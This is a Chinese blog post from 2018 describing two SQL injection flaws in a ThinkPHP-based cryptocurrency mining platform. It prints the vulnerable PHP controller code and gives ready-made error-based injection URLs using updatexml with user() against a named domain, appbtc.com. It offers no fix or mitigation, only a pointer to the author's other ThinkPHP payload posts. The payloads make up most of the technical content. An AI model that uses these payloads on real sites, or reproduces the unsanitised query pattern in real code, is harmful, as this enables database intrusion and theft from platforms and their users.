某挖矿系统(各类币)一些通用漏洞


Nov 09 2018

某挖矿系统(各类币)一些通用漏洞

首页 » 原创作品 » 某挖矿系统(各类币)一些通用漏洞   

某挖矿系统漏洞

网上很多挖矿系统都是由thinkphp框架开发,框架本身是没什么漏洞的,但是到了开发的手上那就不一样了,开发稍微不当,可能就会导致漏洞的产生。

前几天发表了这篇文章,thinkphp一些版本的通杀漏洞payload 漏洞方面也是来源这里。

1.jpg


2.jpg



第一个漏洞


http://appbtc.com/index.php/index/shop/index?gid[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23



漏洞片段


public function index(){
   $items = M('goods');
   $gao = C('max_danjia');
   $rmb_hl = C('rmb_hl');
   $itemsdata = $items->find($_GET['gid']);
   $spjiage = sprintf("%.2f", $itemsdata['goldprice'] / $rmb_hl / $gao);
clipboard.png


4.png


第二个漏洞


//公告详细页
public function newsView(){
    //$data['truename']     = I('post.truename','','htmlspecialchars');
         // $id = I('id');
   $new = M('announce')->where(array('id'=>I('id')))->find();
   $this->assign('new',$new);
   $this->display();
}

 

http://appbtc.com/index.php/index/new/newsView?id[0]=exp&id[1]%20==1))%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23


55.jpg



不懂? 去研究一下 本博客的 有关thinkphp漏洞方面的文章。

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: 挖矿漏洞

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «BurpSuite_v2.0下载 | thinkphp一些版本的通杀漏洞payload»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~